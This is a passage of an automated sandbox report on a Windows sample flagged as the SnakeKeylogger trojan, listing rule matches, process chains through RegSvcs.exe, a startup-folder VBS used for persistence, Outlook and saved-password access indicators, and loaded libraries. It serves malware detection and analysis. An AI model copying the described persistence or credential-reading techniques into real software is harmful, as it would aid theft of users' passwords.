Source: Process Memory Space: savagenesses.exe PID: 2636, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: savagenesses.exe PID: 3620, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@11/10@3/3

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009737B5 GetLastError,FormatMessageW,

0_2_009737B5

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_009610BF AdjustTokenPrivileges,CloseHandle,	0_2_009610BF
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_009616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_009616C3
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FD10BF AdjustTokenPrivileges,CloseHandle,	2_2_00FD10BF
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00FD16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_00FD16C3

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009751CD

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0098A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0098A67C

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_0097648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0097648E

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_009042A2

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

File created: C:\Users\user\AppData\Local\toggeries

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5552

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

File created: C:\Users\user\AppData\Local\Temp\aut8DDF.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs"

Source: YJwE2gTm02.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4522071961.00000000034FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4522071961.00000000034F2000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: YJwE2gTm02.exe	Virustotal: Detection: 44%
Source: YJwE2gTm02.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

File read: C:\Users\user\Desktop\YJwE2gTm02.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\YJwE2gTm02.exe "C:\Users\user\Desktop\YJwE2gTm02.exe"
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Process created: C:\Users\user\AppData\Local\toggeries\savagenesses.exe "C:\Users\user\Desktop\YJwE2gTm02.exe"
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\YJwE2gTm02.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\toggeries\savagenesses.exe "C:\Users\user\AppData\Local\toggeries\savagenesses.exe"
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\toggeries\savagenesses.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 1492
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Process created: C:\Users\user\AppData\Local\toggeries\savagenesses.exe "C:\Users\user\Desktop\YJwE2gTm02.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\YJwE2gTm02.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\toggeries\savagenesses.exe "C:\Users\user\AppData\Local\toggeries\savagenesses.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\toggeries\savagenesses.exe"	Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: YJwE2gTm02.exe

Static file information: File size 1135616 > 1048576

Source: YJwE2gTm02.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: YJwE2gTm02.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: YJwE2gTm02.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: YJwE2gTm02.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: YJwE2gTm02.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: YJwE2gTm02.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: YJwE2gTm02.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: $$.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSystem.Windows.Forms.dllSystem.Windows.Forms.dll source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDB source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: @"o.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: savagenesses.exe, 00000002.00000003.2096617611.0000000003370000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000002.00000003.2102693456.0000000003510000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2239905827.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2242309038.0000000003A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: savagenesses.exe, 00000002.00000003.2096617611.0000000003370000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000002.00000003.2102693456.0000000003510000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2239905827.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, savagenesses.exe, 00000005.00000003.2242309038.0000000003A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?"oC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbtX source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Configuration.pdbL0 source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: RegSvcs.pdbegSvcs.pdbpdbvcs.pdbv4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb) source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Xml.pdba source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o0C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557043101.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBJ source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2557221698.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WERE96C.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERE96C.tmp.dmp.10.dr

Source: YJwE2gTm02.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: YJwE2gTm02.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: YJwE2gTm02.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: YJwE2gTm02.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: YJwE2gTm02.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

Code function: 0_2_009042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009042DE

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00920A76 push ecx; ret	0_2_00920A89
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F90A76 push ecx; ret	2_2_00F90A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_03149C30 push esp; retf 031Ah	3_2_03149D55

Source: C:\Users\user\Desktop\YJwE2gTm02.exe

File created: C:\Users\user\AppData\Local\toggeries\savagenesses.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\savagenesses.vbs

Jump to behavior

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_0091F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0091F98E
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Code function: 0_2_00991C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00991C41
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_00F8F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00F8F98E
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Code function: 2_2_01001C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_01001C41

Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YJwE2gTm02.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\toggeries\savagenesses.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
